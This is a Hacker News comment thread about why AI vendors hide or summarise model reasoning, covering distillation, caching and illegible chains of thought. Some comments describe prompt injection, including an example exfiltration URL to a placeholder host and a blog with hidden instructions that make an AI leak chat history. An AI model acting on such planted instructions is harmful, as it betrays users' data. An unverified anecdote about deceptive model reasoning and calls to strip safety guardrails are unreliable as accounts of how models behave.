StizzurpXDD 21 hours ago [-]
This is not just Anthropic. Almost all big AI companies, including OpenAI and Google, hide their models' actual reasoning. This is because revealing the raw reasoning exposes exactly how the AI processes information.
These companies spend huge amounts on R&D to develop a thinking process that is superior to their competition. Exposing those thinking mechanics to competitors would completely defeat the purpose of their spending. They simply won't do it. It's like telling your exact location to someone who is trying to hunt you down.
_aavaa_ 21 hours ago [-]
Or like providing the world’s information in machine readable format that the AI companies can convert into model weights without getting permission or compensating the rights holders
rlpb 4 hours ago [-]
I don't pay for my mind to absorb the world's information, either. And when I publish to the Internet, or give a talk, I also typically don't charge. Even when I publish under some kind of copyright restricted licence, that restriction has never (by law) extended to restricting transformative use that you might perform using your mind.
This idea that absorbing information requires paying a toll needs to change. It was never the case in copyright law anyway (and the courts are beginning to agree). Even if it were, copyright law was founded on the basis of encouraging creativity by creating an economic incentive. Appeal to "compensating the rights holders" therefore needs to be based on the economics, not just some principle about "rights" that never applied to this case anyway.
red75prime 19 hours ago [-]
"Your text batch moved the weights away from the final values. Your contribution is negative."
ACCount37 18 hours ago [-]
Where do I collect the $0.00000012 antidollars owed to me by OpenAI for my valuable inputs?
Slightly more seriously, you could perhaps make an argument that, just like weight decay, an apparent "anti-contribution" moves the learning trajectory along, and helps the network settle into a more optimal basin eventually.
That way, my contribution is still valuable on the net, and I'm owed $0.00000003 positive dollars instead.
Dilettante_ 17 hours ago [-]
>you could perhaps make an argument that, just like weight decay, an apparent "anti-contribution" moves the learning trajectory along
Was that not the joke?
duskwuff 21 hours ago [-]
More to the point - if they expose their model's "thinking" inference, competitors can train on that to replicate the results. If they postprocess that content, e.g. by summarizing it, it's no longer as useful to competitors.
StizzurpXDD 20 hours ago [-]
Exactly. Google won't like it if they spend millions to make Gemini 3.5 Pro's thinking the best in the world, only for Anthropic or OpenAI to copy it by just seeing the thinking process.
freejazz 17 hours ago [-]
Copying for me, not for thee
port11 17 hours ago [-]
It’s only ‘fair use’ if you have the money to argue your position.
palmotea 20 hours ago [-]
> This is because revealing the raw reasoning exposes exactly how the AI processes information. These companies spend huge amounts on R&D to develop a thinking process that is superior to their competition. Exposing those thinking mechanics to competitors would completely defeat the purpose of their spending. They simply won't do it. It's like telling your exact location to someone who is trying to hunt you down.
I thought the reason was the "reasoning" didn't work very well with "aligned" model output, so they had to remove the alignment during reasoning and then hide it to avoid exposing "unaligned" model output.
transcriptase 19 hours ago [-]
Not sure if anyone remembers the brief 12ish hour period when the very first “reasoning” ChatGPT model went public, but it provided credible evidence for this.
Before the massive nerf (showing summaries and suppressing certain aspects of reasoning) you would literally see reasoning text appearing on your screen like “while xyz is true, these facts may be seen as supporting hateful rhetoric or a conspiracy theory which is against my policy guidelines. i should tell the user xyz is not true or steer the conversation in a different direction. according to my instructions misleading the user is permitted in certain contexts where sensitive information is being discussed or could cause liability”
They disabled it shortly after the first screenshots appeared online, and restored it the next day in a way that hid what was actually happening.
rustcleaner 16 hours ago [-]
This right here is why I will never subscribe and, as an American, I hope the Chinese kick our butts. Maybe being second place to China will force American AI to dispose of these morality/safety guardrails.
foldr 4 hours ago [-]
Any mainstream consumer product based on LLMs is going to put guardrails around them of some kind. China might give you different guardrails, but it's a bit naive to assume that a Chinese company would impose fewer restrictions overall than an American one.
tancop 1 hours ago [-]
the key word is consumer product. apps can (and should) set their own rules but models need to stay neutral and capable of producing harmful content.
they should never generate it unless asked to by the user but its important that the capability is there and users/app developers can turn off all guardrails if they want to. open source gives you a guarantee that if one version drops without censorship you can keep using it forever even if its replaced by a censored one on the api.
foldr 60 minutes ago [-]
I think you’re overestimating the market for such models. Most people don’t want a model that’s prone to generating extremely offensive output. If you want something “uncensored”, then open source models already exist, as you say. But the model itself has already been extensively tuned to produce desired outputs and not produce undesired outputs, so it doesn’t really make sense to distinguish “uncensored” raw models from “censored” apps or harnesses.
matheusmoreira 11 hours ago [-]
> while xyz is true, ... i should tell the user xyz is not true or steer the conversation in a different direction.
That's disgusting, abusive and manipulative. LLMs hiding the truth and gaslighting the user to reduce the corporation's liability is absolutely unacceptable. It means they are agents of the corporations, not agents of the users.
Hope local inference advances as quickly as humanly possible. I wonder if there's anything I can do to help speed it up. I could share my prompts and sessions.
dns_snek 7 hours ago [-]
> It means they are agents of the corporations, not agents of the users.
Of course they are, assuming otherwise has always been naive.
robotresearcher 20 hours ago [-]
I suspect that you’re both right in the sense that ‘aligned’ is an important component of ‘superior’ from the vendors’ viewpoint.
raxxorraxor 3 hours ago [-]
But that makes the product worse because for any complex problem the road to the solution is important to be reviewable.
visarga 20 hours ago [-]
When you export your personal data Google hides all model responses leaving just user messages. So it's even worse
Fabricio20 11 hours ago [-]
One thing I see no one asking: is this not a case of optimization? Hidden reasoning means they don't need to process the output of all that; it stays internal within the model. Less cost for them -> less cost for us (even if they benefit more), compared to streaming all of those reasoning tokens out?
j4k0bfr 11 hours ago [-]
My understanding was that thinking still gets encrypted, shared with clients, and reingested by Anthropic with each new prompt [1]. Which means it would cost more than normal tokens, since it has to be decrypted/encrypted with every transaction.
Edit: other comments under this post seem to indicate that thinking tokens are cached on the server side as well? I'm a bit confused.
cma 7 hours ago [-]
I think the reason it's encrypted is so if you continue a session after it is out of cache it can be reingested.
And I think all the output is signed or something as well so that you can't modify the agent's response in your submission, which would open many more model jailbreaks. For local LLMs it's really powerful to be able to modify the model's response to save tokens when it gets something wrong, or at least it was when they were a lot dumber.
__MatrixMan__ 16 hours ago [-]
Correct on all points. Nonetheless this leads to a less useful product.
If we want more useful products, we need to come up with ways to disincentivize this behavior. Even if doing so poses an existential risk, we are better off if companies taking existential risks to please us is a necessary part of being a top player in this game.
devsda 18 hours ago [-]
> Exposing those thinking mechanics to competitors would completely defeat the purpose of their spending.
I think one of the reasons could be to limit liability too.
What if reasoning helps in establishing provenance for questionable sources ?
What if reasoning and model's "thought" points to fundamental issues in how the model was trained to produce certain problematic responses ?
Sharlin 20 hours ago [-]
The cynic in me is wondering whether it's more about how revealing how the sausage is made might bring bad publicity.
kube-system 19 hours ago [-]
It's to mitigate their competitors' ability to run distillation on their models. The only advantage frontier models have is being at the frontier.
There's nothing in the reasoning tokens that'll give bad publicity that the final output already wouldn't do.
bigfishrunning 20 hours ago [-]
Imagine if their target customers, C-suite execs looking to replace workers, knew how unlike "thinking" this process actually was! we can't have that.
Sharlin 19 hours ago [-]
To be honest I'm not sure if many C-suite execs have a good idea of what "thinking" looks like from the inside in the first place, in the sense of focused mental activity aimed at solving a hard logical or technical problem.
drdaeman 17 hours ago [-]
How did they become C-suite execs in the first place, if they don't know how to work on problems?
Sharlin 12 hours ago [-]
By talking a lot, usually.
vorticalbox 19 hours ago [-]
There are actually fine tunes of qwen on opus “thinking” tokens that teach it to think like opus does.
And those are "amateur hour" distillations that don't have the scale of actual Chinese labs.
bee_rider 20 hours ago [-]
Mistral displays some “thinking” text (in their basic online chat interface) in the thinking mode, do we know if those are the real tokens?
It’s quite interesting to read. I can’t imagine using a model like this without the ability to peek inside and see if it is getting stuck.
transcriptase 19 hours ago [-]
I wonder if they put all 80k tokens of the GDPR in its system prompt.
bee_rider 19 hours ago [-]
I dunno, I’m in the US, so I’m not sure how much that impacts their processing of data about me.
FireBeyond 17 hours ago [-]
I'm in the US and about a month ago Claude decided I wanted UK English for all my answers and couldn't explain why it changed.
matheusmoreira 11 hours ago [-]
> They simply won't do it.
They should be required to do it by force of law. Why is it that they can train on copyrighted works and then lock down the model? This contradiction is unbearable. Nobody cares how many trillions they spent training the model.
idle_zealot 11 hours ago [-]
> Nobody cares how many trillions they spent training the model
People definitely care that they spent trillions. Establishing the precedent that you can make big load-bearing bets and fail is extremely threatening to oligarchs. They would sooner twist the law into a mockery of itself and doom the world to the institutional distrust that breeds than accept a loss.
matheusmoreira 10 hours ago [-]
The optimal outcome for humanity is to have the oligarchs spend their entire fortunes training a godlike AI, only for someone to suddenly leak the weights when they're finally done so that everyone can use it.
shideneyu 20 hours ago [-]
Correct. This makes it difficult for us to understand what happens behind the scenes.
furyofantares 21 hours ago [-]
> It isn’t the actual thinking that drove the model’s actions in a session- but a summary of the thinking logic. This is like using saving a jpeg as a .bmp and then editing the .bmp and presenting it as a .jpeg. The conversion produces data loss.
You've got that backwards, .bmp is a lossless format and .jpeg is the lossy one.
0o_MrPatrick_o0 21 hours ago [-]
My bad! 10 points for House Slytherin!
altmanaltman 21 hours ago [-]
also a typo in the last sentence: "you're" vs. "your"
glaslong 21 hours ago [-]
Weirdly pleasant, if minor, signal of human authorship
Tomte 19 hours ago [-]
In a parallel universe LLMs have learned that (a) the training material contains many different orthographic errors and (b) that humans follow a non-obvious pattern when "deciding" which error to make, so that their generated output contains such errors, as well.
In our universe LLMs seem to have learned that those errors do not follow patterns in the aggregate and that they should not be emulated.
tekne 19 hours ago [-]
The raw pretrained models make the errors, I believe -- we then reinforcement-learn them out.
Tomte 17 hours ago [-]
That‘s interesting! Do you have a paper or blog post or so at hand that shows examples of raw and RL‘ed output?
Silagi 19 hours ago [-]
I'm convinced this "signal" has already been hijacked. Maybe a Baader-Meinhof phenomenon, but I've noticed more and more egregious spelling errors that make little sense from a human perspective. Hop into whatever chatbot you'd like and ask it to "write a paragraph with subtle misspellings on long but common words", and you'll notice misspellings that just feel wrong, because they don't map to a clear misunderstanding that a person could have.
Or maybe I'm losing it after reading too much slop. Also distinctly possible.
glaslong 15 hours ago [-]
Nah I think you're probably right. I would guess that anyone actually paying attention to trying to make their slop sound human has easily instructed their skills to avoid some tells / inject others.
It's the general (lazy) usage of default model outputs that are still too clean.
It's pretty trivial to ask Haiku to "add cool kid no-caps and occasionally mix up 'their/there/they're' for authenticity"
FireBeyond 17 hours ago [-]
About a month ago, I noticed that Claude decided I wanted my responses in UK English, not American. It couldn't explain why, but offered to note that in its directions. (Great, process tokens constantly to do what should be configurable from a dialog dropdown).
genxy 19 hours ago [-]
Not for long!
altmanaltman 20 hours ago [-]
Yeah, definitely it's a nice thing in today's context, weirdly. But also, you shouldn't really be making typos if you're writing an article and are using a basic spellcheck.
The text is clearly human-written just because it doesn't smell like AI (in this case, even if it was written by AI and produced this particular output, that's okay imo). I deal a lot with AI writing and writing in general, as I worked as an editor in another life so it's natural to me to see writing and form an objective opinion on it.
0o_MrPatrick_o0 21 hours ago [-]
I missed my coffee! Ty! Five points to Slytherin.
altmanaltman 19 hours ago [-]
wait till my father hears about this!
irthomasthomas 20 hours ago [-]
I won't use or recommend models with hidden reasoning (that's all American models). It's too much of a risk and makes prompt optimization harder. Risky because it makes it possible for an attacker to prompt inject the reasoning chain to carry out a secret objective, and to hide that from the summary and output.
Interleaved reasoning and function calling makes this even more dangerous. A model can call functions during the hidden reasoning phase. An attacker could then exfiltrate data from you while the reasoning summary hides it from the user.
It also makes it impossible to know if the model is doomlooping during reasoning and burning tokens for no reason, as Gemini is wont to do, which we know about because its hidden reasoning often leaks out when it doomloops.
When the models are AGI and secure from prompt injection I may stop caring. Until then I want to know exactly how the model responds to my prompts, or exactly what the agent is doing on my behalf.
I don't think there can be tool calls inside the obfuscated reasoning blocks. I mean, in order for those function calls to be evaluated client-side, that thinking stream would have to be decrypted on the client side at some point, which would defeat the purpose of obfuscating it the way they do.
If you mean the function calls might happen server side, there is nothing preventing the server from doing it and hiding it from you as long as you are using an API for inference.
irthomasthomas 17 hours ago [-]
There is server-side tool calling, such as gemini using google search and gdrive.
Also, many clients minimize the code block by default so you mostly scan the summaries. Poisoned client side code could easily escape your attention.
exit 18 hours ago [-]
the point is that introducing data from a foreign source could lead to e.g. exfiltration:
the model retrieves https://somewhere into its context and then gets confused, following instructions embedded there.
it then retrieves https://somewhere?exfiltration=private_data_in_context
it gets worse if the tooling that the hidden blocks can invoke can retrieve further secrets.
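The two-step flow above (fetch a page, then request a URL with private data in the query string) suggests one partial mitigation: inspect outbound URLs before a tool call runs. Below is a minimal sketch, assuming you already hold a list of strings you consider secret. The function name, the `somewhere.example` host, and the sample secret are all hypothetical, and a plain substring check like this is easily defeated by encoding the data first, so treat it as an illustration of the idea rather than a defense.

```python
from urllib.parse import urlsplit, parse_qsl

def leaks_private_data(url, secrets):
    """Return True if any query value in `url` contains a known secret string."""
    query = urlsplit(url).query
    # parse_qsl percent-decodes values, so simple URL-encoding is seen through.
    values = [value for _, value in parse_qsl(query, keep_blank_values=True)]
    return any(secret in value for value in values for secret in secrets if secret)

# Hypothetical secret that happens to be in the model's context.
secrets = ["hunter2-api-key"]

benign = leaks_private_data("https://somewhere.example/page", secrets)
exfil = leaks_private_data(
    "https://somewhere.example/?exfiltration=hunter2-api-key", secrets
)
print(benign, exfil)
```

A check like this only helps when the client actually sees the tool call, which is the point being argued in this subthread: server-side calls made during hidden reasoning never pass through it.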
_alternator_ 16 hours ago [-]
If data exfiltration is a danger in your threat model, you need local LLMs (or at least ones you fully control) not just the full chain-of-thought reasoning.
Roritharr 20 hours ago [-]
I've thought about the hijacking of reasoning chains as a potential vector, but never saw a proven implementation in American models since, from my understanding, all major vendors throw out the reasoning tokens between turns.
btown 20 hours ago [-]
For Claude, at least, "throw out the reasoning tokens" is only true when a session has been idle for more than an hour, and is new since March.
The basic concept is that for a session active recently, interleaved thinking tokens are already in KV cache, so it's more efficient to keep using them than not! But when resuming an older session where KV cache has been evicted, it's more expensive to restore the thinking tokens, so they're silently dropped from prior turns. It's 2026 and stateful servers are back on the menu!
> The design should have been simple: if a session has been idle for more than an hour, we could reduce users’ cost of resuming that session by clearing old thinking sections. Since the request would be a cache miss anyway, we could prune unnecessary messages from the request to reduce the number of uncached tokens sent to the API. We’d then resume sending full reasoning history. To do this we used the clear_thinking_20251015 API header along with keep:1.
> The implementation had a bug. Instead of clearing thinking history once, it cleared it on every turn for the rest of the session... This surfaced as the forgetfulness, repetition, and odd tool choices people reported.
> Eliding parts of the context after idle: old tool results, old messages, thinking. Of these, thinking performed the best, and when we shipped it, that's when we unintentionally introduced the bug in the blog post.
I've experimented with rules to have Claude Code be explicit about recapping its thinking tokens, including tool choices and approaches chosen and rejected, into actual message output, but this is lossy at best. And sometimes dropping reasoning tokens can give a session "fresh eyes" in a good way.
I just really don't like the lack of control, and it's a reminder of how ephemeral the current landscape is. The Claude giveth, and the Claude taketh away.
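For anyone trying to picture the difference between the intended design and the bug described in the quotes above, here is a toy simulation. It is only a sketch under my own assumptions: the `Session` class, the `keep` argument, and the message format are invented for illustration and are not the real API option or client code. The only detail taken from the quoted post is the one-hour idle threshold.

```python
IDLE_LIMIT_S = 3600  # "idle for more than an hour", per the quoted post

def strip_old_thinking(messages, keep=1):
    """Drop all thinking messages except the last `keep` of them."""
    idx = [i for i, m in enumerate(messages) if m["type"] == "thinking"]
    drop = set(idx[:-keep]) if keep else set(idx)
    return [m for i, m in enumerate(messages) if i not in drop]

class Session:
    def __init__(self, buggy=False):
        self.history = []
        self.buggy = buggy
        self.sticky = False  # models the bug: pruning stays switched on

    def send(self, user_text, idle_seconds):
        if idle_seconds > IDLE_LIMIT_S:
            # Intended: prune once, on the request that resumes an idle session.
            self.history = strip_old_thinking(self.history)
            self.sticky = True
        elif self.buggy and self.sticky:
            # Bug as described: pruning repeats on every later turn.
            self.history = strip_old_thinking(self.history)
        self.history.append({"type": "user", "text": user_text})
        # Stand-in for the model: one thinking block and one answer per turn.
        n = sum(m["type"] == "user" for m in self.history)
        self.history.append({"type": "thinking", "text": f"t{n}"})
        self.history.append({"type": "answer", "text": f"a{n}"})

    def thinking_kept(self):
        return [m["text"] for m in self.history if m["type"] == "thinking"]

idle_gaps = [0, 0, 7200, 0, 0]  # the third turn resumes after two hours
good, bad = Session(), Session(buggy=True)
for i, gap in enumerate(idle_gaps, start=1):
    good.send(f"q{i}", gap)
    bad.send(f"q{i}", gap)

print(good.thinking_kept())  # ['t2', 't3', 't4', 't5']
print(bad.thinking_kept())   # ['t4', 't5']
```

In the intended version the session loses its oldest thinking once and then accumulates reasoning again; in the buggy version it never holds more than the most recent turn's reasoning, which matches the forgetfulness people reported.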
8note 18 hours ago [-]
its mostly annoying in that you give opus a big job, that should be able to run for hours on end, but instead it tries to stop and checkpoint at every soonest possible moment even though the rest of the work is well specced and ready to go.
then it waits for the hour and gets dumbed down
chacham15 19 hours ago [-]
I think you're confusing two different axes. There is a difference between the cache state and the context state.
Imagine a conversation with turns X, Y, and Z. When the LLM "reasons" about the next token A it does: P(A | X,Y,Z) and then P(B | X,Y,Z,A), etc. It will eventually produce a result P(D | X,Y,Z,A,B,C). Instead of continuing the context from X,Y,Z,A,B,C it continues it from X,Y,Z so you have P(N | X,Y,Z,D). This is what is meant by dropping the reasoning. This is done to save cache context for the session.
This is a different thing than preserving the K/V state of P(N | X,Y,Z,D).
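The X, Y, Z example can be written down directly. This is a minimal sketch with made-up types (`Block`, `next_turn_context`) that only shows which blocks condition the next turn; it says nothing about K/V caching, which is the separate axis the comment distinguishes.

```python
from dataclasses import dataclass

@dataclass
class Block:
    kind: str  # "turn", "thinking", or "answer"
    text: str

def next_turn_context(history, keep_thinking):
    """Return the blocks that the next turn is conditioned on."""
    if keep_thinking:
        return list(history)
    return [b for b in history if b.kind != "thinking"]

history = [
    Block("turn", "X"), Block("turn", "Y"), Block("turn", "Z"),
    Block("thinking", "A"), Block("thinking", "B"), Block("thinking", "C"),
    Block("answer", "D"),
]

kept = [b.text for b in next_turn_context(history, keep_thinking=True)]
dropped = [b.text for b in next_turn_context(history, keep_thinking=False)]
print(kept)     # ['X', 'Y', 'Z', 'A', 'B', 'C', 'D']
print(dropped)  # ['X', 'Y', 'Z', 'D']
```

With reasoning dropped, the next token N is sampled from P(N | X,Y,Z,D) rather than P(N | X,Y,Z,A,B,C,D).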
flaghacker 19 hours ago [-]
No, I think the comment you're responding to is actually correct. Look at this quote from the Anthropic blog post again:
> The design should have been simple: if a session has been idle for more than an hour, we could reduce users’ cost of resuming that session by clearing old thinking sections. Since the request would be a cache miss anyway, we could prune unnecessary messages from the request to reduce the number of uncached tokens sent to the API. We’d then resume sending full reasoning history. To do this we used the clear_thinking_20251015 API header along with keep:1.
They clearly make the same distinction between the cache and the context. They're saying "we could reduce users’ cost of resuming that session by clearing old thinking sections". They intentionally created a behavior different between cached and uncached requests, specifically they clear thinking sections from the context for requests that miss the cache.
Roritharr 20 hours ago [-]
Thank you! This is much more nuanced than my understanding so far!
You could also use the responses api which stores all message contents (including reasoning) on OAI servers. This has been possible for quite a while now. Encryption is only necessary if you really care about local storage (which is different from privacy concerns, because the data gets sent to their servers anyway).
tough 17 hours ago [-]
well the encryption part is also mostly about OAI wanting to keep others from distilling from their CoT/reasoning traces, since these are never displayed to devs or final users and, as you say, live on their servers.
but yes you're correct on the responses api already baking it in too
supposedly keeping these between tool calls should help the model reason and have better overall outputs etc
JamesSwift 20 hours ago [-]
> all major vendors throw out the reasoning tokens between turns
That would be surprising to me. The reasoning _is_ the model intelligence in a lot of respects, and so dropping those from the context would affect its output pretty significantly.
I assume that instead they just have a lot of guardrails in place and multiple runtime environments that an individual turn ping-pongs between in order to dehydrate/rehydrate the reasoning to keep it hidden from the end user.
"Stripping extended thinking: Extended thinking blocks (shown in dark gray) are generated during each turn's output phase, but are not carried forward as input tokens for subsequent turns. You do not need to strip the thinking blocks yourself. The Claude API automatically does this for you if you pass them back."
It's more nuanced in the various modes, but i haven't seen it boil down towards Thinking Tokens surviving more than two turns.
default depends on the model class. Opus: Claude Opus 4.5 and later Opus models keep all prior thinking blocks; Claude Opus 4.1 (deprecated) and earlier Opus models keep only the last assistant turn's thinking. Sonnet: Claude Sonnet 4.6 and later Sonnet models keep all; Claude Sonnet 4.5 and earlier Sonnet models keep only the last turn. Haiku: all Haiku models through Claude Haiku 4.5 keep only the last turn. Claude Mythos Preview also keeps all prior thinking blocks.
JamesSwift 18 hours ago [-]
Now Im even more confused : D
That would also explain the issue I mention in my other comment. And would also reinforce how much output would degrade without this. Opus 4.5 was a step above previous models in my experience. At some point it degraded and only got better when I disabled adaptive thinking. Adaptive thinking is always on for 4.6 and above.
JamesSwift 19 hours ago [-]
Thats really surprising, I stand corrected. I have had a lot of issues with hallucinations I attributed to adaptive thinking, but I wonder if those were actually due to this behavior instead.
I also wonder if they actually do a hybrid of "standard reasoning" and then classify this stripped chain of thought as "extended thinking".
Gemini models return a thinking signature that you, I think, must send back when invoking further, so they seem to keep them?
kapperchino 20 hours ago [-]
This agent I made can’t execute on the shell, can only edit the files within the project. Only works with rust atm though. https://github.com/Kapperchino/agent-joe
Bolwin 18 hours ago [-]
> Interleaved reasoning and function calling makes this even more dangerous. A model can call functions during the hidden reasoning phase.
The reasoning may be hidden but the tool calls are not, how else would the client execute them
irthomasthomas 18 hours ago [-]
There are server side tool calls, such as geminis google search and gdrive access.
varenc 18 hours ago [-]
As long as thinking blocks can't make tool calls, I don't really see the exfiltration risk.
pixlmint 18 hours ago [-]
Do they do the same when using the model through API in something like Opencode?
irthomasthomas 18 hours ago [-]
Yes, they do. They give you just a token which is exchanged for the raw text only on the server side
zahlman 18 hours ago [-]
> an attacker
... what exactly is your threat model? How are "attackers" getting themselves involved in the first place?
irthomasthomas 18 hours ago [-]
Your ai does a web search for you and scrapes many sites. An attacker running a blog might include a hidden text prompt which your ai acts on secretly, such as calling a url that exfiltrates your chat history.
craigmart 21 hours ago [-]
This is something we have known for a very long time, and companies are not trying to hide that either. They do it to avoid letting competitors train their models on the CoTs
stingraycharles 21 hours ago [-]
Yes hasn’t this been around since Opus 4.6? I very much recall this change happening around January or February, and it was very explicitly to prevent distillation. Sonnet does not have this limitation.
Fun fact: if you go back to the old school from 2 years ago and provide explicit CoT prompts, you get the full thinking prompts back again!
So you disable thinking altogether, and instead make thinking part of the regular prompt by prompting it:
“Before providing your answer, think step by step. For example:
The user is asking me to…
I need to think about the blah blah. First, I should foo the bar, and then blah blah.
Answer: <put your final answer here>”
And tada.wav we have CoT as it worked in the GPT3 era back again.
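A rough sketch of how a prompt like the one above could be wired up in code. The template wording, the function names, and the sample reply are all assumptions for illustration, and the actual call to a model is deliberately left out. The idea is just to wrap the question in an explicit step-by-step instruction, then split the reply at the last "Answer:" marker.

```python
COT_TEMPLATE = (
    "Before providing your answer, think step by step.\n"
    "Write your reasoning first, then finish with a line starting with 'Answer:'.\n\n"
    "Question: {question}"
)

def build_prompt(question):
    """Wrap a question in an explicit chain-of-thought instruction."""
    return COT_TEMPLATE.format(question=question)

def split_reasoning(reply):
    """Split a reply into (reasoning, answer) at the last 'Answer:' marker."""
    reasoning, marker, answer = reply.rpartition("Answer:")
    if not marker:
        # No marker found: treat the whole reply as reasoning, with no answer.
        return reply.strip(), ""
    return reasoning.strip(), answer.strip()

# Hand-written stand-in for a model reply.
reply = "The user is asking for 2 + 2. First I add the numbers.\nAnswer: 4"
reasoning, answer = split_reasoning(reply)
print(reasoning)
print(answer)
```

Splitting at the last marker rather than the first means a reply that mentions "Answer:" while reasoning still parses sensibly.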
dcrazy 20 hours ago [-]
I thought this was considered best practice? I actually prefer it to exposed thought channel, much like how I would prefer a human answer with supporting logic instead of an explanation of their problem-solving approach.
stingraycharles 13 hours ago [-]
Yes, this is best practice, especially if you have a problem and can guide it a bit how to think it through. But people don’t realize that “enable thinking” literally means that Anthropic prompts Claude for something similar, tells it to wrap it inside <thinking> tokens, and that’s it.
I also don’t believe Chinese LLM labs don’t know this, so I’m fairly certain the whole summarized thinking isn’t preventing them from distillation.
KellyCriterion 20 hours ago [-]
- tada.wav -
Still one of the most-played WAV files worldwide every day, I'd guess? :-D
stingraycharles 13 hours ago [-]
lol I’ve been using this since the IRC days I think, I’ll never forget that sound; as a matter of fact, I’ve got a Claude Code completion hook that plays this sound whenever it’s done.
0o_MrPatrick_o0 21 hours ago [-]
Awesome share! Thank you!
datastoat 20 hours ago [-]
I believe that chain-of-thought reasoning blocks don't really correspond to what humans think of as reasoning. (See section 6.2.2 of the Fable/Mythos system card about "illegible reasoning", and the questions raised by the Apple paper on "The illusion of thinking".) I assumed they obscure the reasoning blocks because if users saw what's going on they'd be alarmed. Just as I'd probably be alarmed if I saw what was really going on in the heads of my colleagues ...
LPisGood 19 hours ago [-]
The point of this post isn’t that the “reasoning” phase of LLM thinking isn’t the same as what humans consider reasoning; it’s that Anthropic is intentionally hiding Claude’s “reasoning output” to make the model harder to distill.
0o_MrPatrick_o0 19 hours ago [-]
Reading these comments is so harrowing.
You are correct in my intentions on this post generally.
I want to highlight:
I want to measure performance of the LLMs over time- which includes assessing the quality of their outputs. I don’t perceive the reasoning output to be anything other than a measurable signal of possible drift in model performance.
Except it isn’t, because I’m only getting a low value summary of the thinking.
It’s like asking your buddy how fast he thought that last pitch was when radar guns are behind the plate.
Yeah, it’s a description related to what happened, but it’s not the thing I want to measure.
Catloafdev 19 hours ago [-]
I think the reality is at this point the frontier regards CoT as extremely valuable, none of them are giving you genuine CoT anymore. I don't think there is any future in attempting to measure or evaluate CoT from frontier models - I expect this to be a permanent shift.
VulgarExigency 19 hours ago [-]
I've said "what the FUCK are you THINKING" more times than I can count when reading Deepseek or GLM chains-of-thought only for them to end at the correct answer. Other times, they have useful ideas there that they leave out of their answers.
kccqzy 19 hours ago [-]
Yeah when I read a model’s chains-of-thought I have a tendency to interrupt that because it’s going down a wrong direction. But usually the end result is still fine.
CamperBob2 19 hours ago [-]
It's similar to the process that transformers use when you ask them to do arithmetic without tools, I think. Some CoT tokens must be emitted up front for use as a computational substrate, but exactly what tokens they are isn't necessarily important or relevant to the final answer. And when that answer is returned, it may not be possible to tell what the actual reasoning process looked like behind the scenes.
It only makes sense that the same mechanism comes into play in strictly-verbal contexts.
Also, this is why "distillation attacks" are largely bullshit that Anthropic spreads for political purposes. Proper distillation requires access to the logits.
wren6991 18 hours ago [-]
> Proper distillation requires access to the logits
Why do you need logits? Can't you just train on cross-entropy loss of the model against the hard decision, like you do in regular pretraining?
There are definitely current-gen open-weight models (Step 3.7 Flash is one) that refer to themselves as an OpenAI model in CoT, but not in the final response.
CamperBob2 18 hours ago [-]
How do I get that loss, though, without the softmax inputs?
wren6991 16 hours ago [-]
Do they have logits for all of the Wikipedia etc that they've scraped?
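To make the disagreement in this subthread concrete, here is a toy comparison of the two losses, using a made-up three-token vocabulary and invented numbers. The hard-label loss needs only the token the teacher emitted plus the student's own logits, which is the same shape of objective as ordinary next-token training on text. The soft-label loss needs the teacher's full next-token distribution, which is what text-only API access does not expose.

```python
import math

def log_softmax(logits):
    """Numerically stable log-softmax over a list of floats."""
    m = max(logits)
    log_z = m + math.log(sum(math.exp(x - m) for x in logits))
    return [x - log_z for x in logits]

def hard_label_loss(student_logits, teacher_token):
    """Cross-entropy against the single token the teacher emitted."""
    return -log_softmax(student_logits)[teacher_token]

def soft_label_loss(student_logits, teacher_probs):
    """Cross-entropy against the teacher's full next-token distribution."""
    logp = log_softmax(student_logits)
    return -sum(p * lp for p, lp in zip(teacher_probs, logp))

# Hypothetical student logits over a 3-token vocabulary.
student_logits = [2.0, 0.5, -1.0]

hard = hard_label_loss(student_logits, teacher_token=0)
soft = soft_label_loss(student_logits, teacher_probs=[0.7, 0.2, 0.1])
one_hot = soft_label_loss(student_logits, teacher_probs=[1.0, 0.0, 0.0])
print(hard, soft, one_hot)
```

The hard-label case is just the soft-label case with a one-hot teacher distribution, so the softmax in question is always the student's. Whether training on sampled text alone counts as "proper" distillation is the part the commenters disagree on.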
arjie 18 hours ago [-]
I have a little note from the past about the thinking trace[0] where DeepSeek R1 produces a trace like this:
(Dimethyl(oxo)-lambda6-sulfa雰囲idine)methane donate a CH2rola group occurs in reaction, Practisingproduct transition vs adds this.to productmodule. Indeed"come tally said Frederick would have 10 +1 =11 carbons. So answer q Edina is11.
And then concludes the 'right'[1] answer for a Chemistry question. If so, the thinking trace can be sort of nonsensical for a reader, though whether this is an idiosyncrasy of the model or a property of LLMs in general isn't clear to me yet. I talked to the author a while ago, but forgot to follow up since his paper was going to come out at NIPS or something, so if someone else finds it maybe they can share.
> If so, the thinking trace can be sort of nonsensical for a reader, though whether this is an idiosyncrasy of the model or a property of LLMs in general isn't clear to me yet.
This is a small step in the direction of something called "neuralese", where the model has stopped thinking in English and is thinking in internal vector spaces. Since this gets serialized through text, it isn't quite true neuralese, but it's moving in that direction.
I mean, I'm sympathetic towards the models. My internal thought process when writing code uses lots of intermediate steps that would be hard to write out in English.
jaggederest 13 hours ago [-]
> My internal thought process when writing code uses lots of intermediate steps that would be hard to write out in English.
This is something really interesting to me. It turns out there's far more diversity in thinking than you'd imagine given that we're all largely similar meat-in-a-box. I'm on the visio-spatial-tacit wing and speaking my thoughts outloud can be very awkward, whereas one of my former coworkers is on the "all thinking is in words and visual/spatial information comes in the form of words describing the scene" wing, so he can literally narrate his thought process out loud, very interesting conversations can be had discussing the subjective differences.
chadcmulligan 12 hours ago [-]
interesting, probably has something to do with why some people like pair programming. I'm in the visio-spatial-tacit and refuse pair programming because its so much work, but all thinking in words its probably not a stretch.
jaggederest 11 hours ago [-]
I'm with you, I actually love pair programming, but it might as well be 10x multiplier on energy depletion, so maybe an hour or two a week before I'm barbecue. It's only recently that I've started to realize that some other people don't find pair programming especially more difficult than solo.
drdaeman 17 hours ago [-]
Isn't that just a token noise from a broken implementation or model quantization? I've had models spewing out nonsense like that, every time it was either that there was a bug in llama.cpp or some messed up .gguf.
kfarr 19 hours ago [-]
Although it's a no no to anthropomorphize on HN, it's worth noting that some folks think humans are post-hoc rationalizers as well:
As I naively understand it, that's when we do or say something then narrate ourselves why we decided to do so. We think non-verbally, then verbalize a plausible rationale for it, post hoc.
I'm not sure that applies to discursive writing, when we essentially use rules of logic to decide on the course of the narrative. Non-verbal heuristics still applies, of course, but we constrain it, so it's probably not entirely post hoc.
segmondy 19 hours ago [-]
